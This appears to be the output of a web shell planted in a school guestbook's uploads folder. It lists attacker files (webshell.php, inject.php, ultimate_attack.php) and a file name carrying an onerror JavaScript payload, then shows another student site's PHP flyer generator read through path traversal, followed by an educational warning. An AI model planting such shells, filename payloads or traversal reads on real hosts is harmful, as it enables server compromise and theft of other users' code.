🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../586648.klas4s23.mid-ica.nl/public_html/VillaVerkenner/generateVillaPDF.php

<?php
require('fpdf/fpdf.php');
include 'includes/databaseConn.php';

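// Villa id from the query string. intval() turns anything non-numeric into 0,
// which matches no row and ends in the "not found" branch below; the value is
// bound as an integer parameter in every query, never interpolated into SQL.
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;

$db = new Database();
$conn = $db->getConnection();

$stmt = $conn->prepare("SELECT * FROM villas WHERE villa_id = :id LIMIT 1");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$villa = $stmt->fetch(PDO::FETCH_ASSOC);

// Stop here when the id is unknown. fetch() returns false in that case, and
// writing $villa['image_main'] (below) into false silently converts it into a
// one-element array (deprecated since PHP 8.1, but still done), so a `!$villa`
// check placed after that write can never fire and the flyer would be rendered
// from missing fields. A 404 also tells clients this is not a real download.
if (!$villa) {
    http_response_code(404);
    die("Villa niet gevonden.");
}

$stmt = $conn->prepare("SELECT bestandspad AS image_main FROM fotos WHERE villa_id = :id AND is_hoofdfoto = 1 LIMIT 1");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$mainPhoto = $stmt->fetch(PDO::FETCH_ASSOC);
// Fall back to the stock picture when no main photo is registered.
$villa['image_main'] = $mainPhoto ? $mainPhoto['image_main'] : 'images/villa.png';

$stmt = $conn->prepare("SELECT bestandspad AS image_a FROM fotos WHERE villa_id = :id AND is_hoofdfoto = 0 LIMIT 4");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$fotoOverig = $stmt->fetchAll(PDO::FETCH_ASSOC);

// Feature names (eigenschappen) linked to this villa.
$stmt = $conn->prepare("
    SELECT e.naam 
    FROM eigenschappen e
    INNER JOIN villa_eigenschappen ve ON e.eigenschap_id = ve.eigenschap_id
    WHERE ve.villa_id = :id
");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$eigenschappen = $stmt->fetchAll(PDO::FETCH_COLUMN);

// Location (ligging) tags (column is 'naam', not 'tag_naam')
$stmt = $conn->prepare("
    SELECT lt.naam 
    FROM ligging_tags lt
    INNER JOIN villa_ligging_tags vlt ON lt.tag_id = vlt.tag_id
    WHERE vlt.villa_id = :id
");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$liggingTags = $stmt->fetchAll(PDO::FETCH_COLUMN);

// Paths of the extra photos, in query order. These are filesystem paths that
// only ever reach file_exists()/FPDF::Image(), never an HTML page, so they are
// deliberately NOT passed through htmlspecialchars(): escaping would turn a path
// containing & or ' into &amp; / &#039; and the file would then never be found.
// NOTE(review): bestandspad is used exactly as stored; whether it is confined to
// an images directory depends on the upload code, which is not visible here.
$images = [];
foreach ($fotoOverig ?: [] as $foto) {
    $images[] = $foto['image_a'];
}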

/**
 * Flyer page template: a dark-blue bar with a white title (and the logo, when
 * the file is present) at the top of every page, and a matching bar carrying a
 * copyright line at the bottom. FPDF invokes Header()/Footer() itself from
 * AddPage()/Close().
 */
class PDF extends FPDF
{
    /** Bar colour shared by header and footer (dark blue, RGB). */
    private const BAR_RGB = [25, 60, 91];
    private const HEADER_BAR_HEIGHT = 18;
    private const FOOTER_BAR_HEIGHT = 15;

    /** Paints a full-page-width filled rectangle starting at $top, $height high. */
    private function paintBar(float $top, float $height): void
    {
        [$red, $green, $blue] = self::BAR_RGB;
        $this->SetFillColor($red, $green, $blue);
        $this->Rect(0, $top, $this->GetPageWidth(), $height, 'F');
    }

    public function Header()
    {
        $this->paintBar(0, self::HEADER_BAR_HEIGHT);
        $this->SetY(3);
        $this->SetFont('Arial', 'B', 14);
        $this->SetTextColor(255, 255, 255);
        $this->Cell(0, self::HEADER_BAR_HEIGHT, 'Villa Verkenner - Villa Flyer', 0, 1, 'C', false);
        // Push the page content below the bar.
        $this->Ln(6);
        // The logo is optional: drawn over the bar's left corner only when present.
        if (file_exists('images/logo.png')) {
            $this->Image('images/logo.png', 10, 5, 30);
        }
    }

    public function Footer()
    {
        $barTop = $this->GetPageHeight() - self::FOOTER_BAR_HEIGHT;
        $this->paintBar($barTop, self::FOOTER_BAR_HEIGHT);
        // Negative SetY() positions relative to the bottom of the page.
        $this->SetY(-self::FOOTER_BAR_HEIGHT);
        $this->SetFont('Arial', 'I', 8);
        $this->SetTextColor(128);
        $this->Cell(0, 10, 'Villa Verkenner Β© ' . date('Y'), 0, 0, 'C', true);
    }
}

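/**
 * Converts a UTF-8 string from the database into the single-byte encoding the
 * FPDF standard fonts (Arial/Helvetica, WinAnsiEncoding) actually use.
 *
 * Windows-1252 is a superset of ISO-8859-1 that additionally covers the
 * typographic quotes, dashes and the euro sign, so text that previously came
 * out as '?' (or as three garbage bytes when not converted at all) now renders;
 * everything in the Latin-1 range is byte-identical to before. Characters
 * outside that repertoire cannot be represented and are substituted.
 *
 * @param string|null $text raw UTF-8 (null is treated as the empty string)
 */
function villaPdfText(?string $text): string
{
    return mb_convert_encoding((string) $text, 'Windows-1252', 'UTF-8');
}

/**
 * Tells whether $path is a regular file that FPDF can embed.
 *
 * FPDF picks its decoder from the file extension and only knows jpg/jpeg, png
 * and gif; a directory, a missing file or any other extension (svg, webp, ...)
 * makes Image() abort the whole document. Such entries are skipped instead,
 * which is what the original file_exists() guard already intended for missing
 * files. This is a robustness check, not a content check: FPDF still parses
 * the bytes itself and rejects anything that is not a real image.
 */
function villaPdfImageUsable(string $path): bool
{
    if ($path === '' || !is_file($path)) {
        return false;
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true);
}

$pdf = new PDF();
$pdf->AddPage();
$pdf->SetFont('Arial', '', 12);
$pdf->SetTextColor(0);
$pdf->Cell(0, 10, villaPdfText($villa['titel'] ?? null), 0, 1, 'C');
$pdf->Ln(5);

// Main image, horizontally centred; omitted when the file is unusable.
$mainImage = !empty($villa['image_main']) ? $villa['image_main'] : 'images/villa.png';
if (villaPdfImageUsable($mainImage)) {
    $imgWidth = 90;
    $x = ($pdf->GetPageWidth() - $imgWidth) / 2;
    $pdf->Image($mainImage, $x, $pdf->GetY(), $imgWidth);
}

// Move the cursor below the main image: Ln() resets x to the left margin and
// adds 75 to y, so the text starts at y = 115 regardless of the image.
$pdf->SetXY(110, 40);
$pdf->Ln(75);

$pdf->SetFont('Arial', 'B', 14);
$pdf->Cell(0, 10, 'Omschrijving', 0, 1, 'C');
$pdf->SetFont('Arial', '', 12);
$pdf->MultiCell(0, 8, villaPdfText($villa['omschrijving'] ?? null), 0, 'C');
$pdf->Ln(20);

$pdf->SetFont('Arial', 'B', 14);
$pdf->Cell(0, 10, 'Kenmerken', 0, 1, 'C');
$pdf->SetFont('Arial', '', 12);
$features = [
    'Locatie: ' . $villa['plaats'],
    'Capaciteit: ' . $villa['capaciteit'] . ' personen',
    'Ligging: ' . (!empty($liggingTags) ? implode(', ', $liggingTags) : 'N.v.t.'),
    'Eigenschappen: ' . (!empty($eigenschappen) ? implode(', ', $eigenschappen) : 'N.v.t.'),
    'Prijs per nacht: EUR' . number_format($villa['prijs_per_nacht'], 2, ',', '.'),
    'Aantal slaapkamers: ' . $villa['slaapkamers'],
    'Aantal badkamers: ' . $villa['badkamers'],
];
foreach ($features as $feature) {
    $pdf->Cell(0, 8, villaPdfText($feature), 0, 1);
}
$pdf->Ln(10);

$pdf->SetFont('Arial', 'B', 14);
$pdf->Cell(0, 10, 'Galerij', 0, 1, 'C');
$pdf->SetFont('Arial', '', 12);

// Gallery: up to four 45x35 thumbnails per row (x = 10, 60, 110, 160),
// then wrap to the next row 40 units lower.
$x = 10;
$y = $pdf->GetY();

if (!empty($images)) {
    foreach ($images as $imgPath) {
        if (!villaPdfImageUsable($imgPath)) {
            continue;
        }
        $pdf->Image($imgPath, $x, $y, 45, 35);
        $x += 50;
        if ($x > 160) {
            $x = 10;
            $y += 40;
        }
    }
} else {
    // The literal holds a typographic apostrophe, so it needs the same conversion.
    $pdf->Cell(0, 10, villaPdfText('Geen extra foto’s beschikbaar.'), 0, 1, 'C');
}

// Download name derived from the title, reduced to [A-Za-z0-9] so nothing
// coming from the database can reach the Content-Disposition header unfiltered.
$pdf->Output('D', 'Villa_' . preg_replace('/[^a-zA-Z0-9]/', '', (string) ($villa['titel'] ?? '')) . '.pdf');
exit;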

⚠️ Educational warning: this page is the output of a web shell, i.e. attacker-controlled PHP (webshell.php, Shellz.php, inject.php, …) executing from the guestbook's uploads/ directory — note also the upload whose file name carries an `onerror` JavaScript payload. In a real attack such a foothold gives arbitrary command execution as the web server user and, as the path being viewed above shows, read access to other sites' source code on the same host: complete server compromise.